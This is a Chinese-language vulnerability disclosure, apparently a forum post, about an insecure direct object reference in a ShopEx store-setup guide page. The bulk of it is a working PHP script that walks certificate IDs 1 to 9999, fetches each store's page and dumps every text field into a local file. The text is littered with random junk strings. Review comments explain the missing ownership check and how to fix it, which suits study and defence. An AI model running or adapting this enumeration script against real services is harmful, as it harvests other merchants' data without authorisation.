|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
|2 r& f: x( ~0 @1 T6 f. o
. a3 x5 B y2 f8 U3 v
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
. n a& x9 M8 s9 c/ g' p. i
' F- t6 z# s! w y X! t6 y d7 a7 {" u n' f
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! k0 f2 D- X( c! k$ z
' Y. s- H, t$ h# {8 e& k7 b) G. f
2 P- z6 I6 v% P. W# Z8 m5 G4 F
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
2 z, O- w: n' U. }: i* W1 _
6 d* t. R6 ]7 D; L5 N
# y7 e2 s) g0 R' D
7 y( \8 A9 T% E; |; d: w<?php6 x& ~; ?% }7 B
// Proof-of-concept driver from the disclosure: walks certi_id 1..9999 and asks
// ShowshopExD() to fetch the guide page for each one. Nothing in this loop
// authenticates as the owner of any certi_id -- that absence of an ownership
// check is the defect the report describes.
// NOTE(review): from a defender's side this traffic is distinctive: a single
// client issuing thousands of step2.php requests whose base64 `refer` decodes
// to consecutive certi_id values. Rate limiting plus a server-side check that
// the requester may access that certi_id would stop the enumeration.
0 K% h! C0 ]9 M" M# q0 q for ($i=1; $i < 10000; $i++) { // enumerate certi_id 1..9999
% p3 z9 L: c/ p( U
ShowshopExD($i);
: o( y% t& o- K8 L ^" x9 M. ? v- k* r' A: F8 E
}
V5 ^6 h% T0 o5 j- g# n3 e
/**
 * Fetches guide.ecos.shopex.cn/step2.php for one certificate id and records the
 * text-input fields the page comes back with.
 *
 * The request carries a `refer` parameter that is nothing more than base64 of
 * {"certi_id":<$cid>,"callback_url":...}; only intval() is applied to $cid, so
 * any integer the caller picks is sent as-is. When the response echoes that
 * refer back, every <input type="text" ...> name/value pair is printed and
 * appended to c:/shopEx.txt as one "name:value" line per field, followed by a
 * separator line.
 *
 * @param int|string $cid  certificate id placed into the refer payload
 * @return void  output goes to stdout and to c:/shopEx.txt; nothing is returned
 *
 * NOTE(review): the server side is not visible here, but the behaviour the
 * report relies on is that step2.php fills those inputs from certi_id alone,
 * with nothing tying the id to the requester (missing object-level
 * authorization, i.e. an IDOR). The fix belongs on the server: verify that the
 * caller is entitled to that certi_id (bind it to the session) or sign the
 * refer token so a tampered payload is rejected; merely re-encoding the
 * parameter does not remove the gap.
 */
! M0 ^* g) r; x) t7 W+ w! K function ShowshopExD($cid) {
1 A {: y4 x/ m/ ]7 L' F+ S5 ~# H2 A: c% M( V7 _
$url='http://guide.ecos.shopex.cn/step2.php';
0 f0 I+ K: I' @: b: X1 i: C" M
// intval() is the only treatment $cid gets; the integer is embedded verbatim
// in the JSON that becomes the refer parameter.
4 @7 o7 y& ]6 d $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
6 i8 _! H4 C u) z6 V
- m) K E% N. d $url = $url.'?refer='.$refer;% U- }, S" G; W/ r' d' \1 |& W
" j2 {1 S& M% t7 J$ T
$ch = curl_init($url);
3 T2 [; S4 n/ \5 {7 U- S7 u( S7 n) \$ t; m
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 d f) ?/ R4 e. I, W' Q+ D
. o) e( G6 N; q/ C* P M; K" B curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
1 Q' ^7 V9 p4 q' n' J8 H7 w* n0 ^) u3 C5 N
$result = curl_exec($ch);! o6 z. n2 T; V
// Body is re-encoded from UTF-8 to gb2312 before the regex work below.
0 f3 O' K/ {2 t: n4 ` $result = mb_convert_encoding($result, "gb2312", "UTF-8");
& `7 b( y, ?" l1 A) W* T% w' m2 `2 R0 S8 L
// Only a page that reflects our own refer value back is treated as a hit.
if(strpos($result,$refer))" C9 Y& n% J# ^ \( r
+ A' s8 n& m4 Q: N: U, m
{2 s4 u! N Q1 q/ u
: I* g. x/ t4 z& g- t $fp = fopen("c:/shopEx.txt",'ab'); // append to the output file
6 n/ L! q9 T+ b; o H% J7 Y* i7 l: }0 R0 }# \+ u: C* `
// Collect every <input type="text" .../> tag, then pull name/value out of each.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);- I2 s) x4 w* T; @. M
% Q3 r4 I; j& C) c) [ foreach ($value[1] as $key) {7 w S& e7 v! H. o7 x4 l
- I8 r1 s0 E. L/ j3 z$ p+ M
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);5 M) Z3 I$ s+ A
* l2 y$ x6 L. y
echo $res[1][0].':'.$res[3][0]."\r\n";
+ r8 K" `: t, t# X& I, T6 ^1 L" W
// Same "name:value" line is written to the file that was just echoed.
' R! f$ x, |7 _, G3 g $col =$res[1][0].':'.$res[3][0]."\r\n"; 5 X' {, ^% z J) y+ g5 J( k
$ }7 z# Z0 P" G; j/ O6 B fwrite($fp, $col, strlen($col)); ! i8 f6 h0 i. c
/ u2 S& }! P$ i2 y4 G }
& ?" Q8 D: O$ q1 p# u" W% S& O5 L" n" T4 h6 k- E
// Separator between the field dumps of consecutive certi_id values.
echo '--------------------------------'."\r\n";3 H& V8 V; n; o( R
# M- q7 Y+ E* G- h6 N2 ^
fclose($fp);
3 f4 p4 p( D1 f% l
' P1 g% k& }+ f; X$ x, b% V }0 H3 Z" n4 o: d5 P, V* Q$ j
/ b# w& C7 V+ v. p- [, R; U
// Push the echoed lines out before the curl handle is released.
flush();
# S5 ]0 F$ G; m0 \: ]2 `; f' m9 |. z. J$ M4 X3 [
curl_close($ch);
+ I8 e* J7 o$ D4 E6 H
/ M& U% Y( C9 z1 K6 d0 @9 ` }+ u9 v, X0 `+ E) K+ f# B
( t7 }2 l/ @; g" i
?>, F" P# n$ O/ d+ S: r' I9 ^& d0 H
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式。仅更换编码或加密方式并不能消除根因，服务端仍需校验请求方是否有权访问该certi_id。
|
|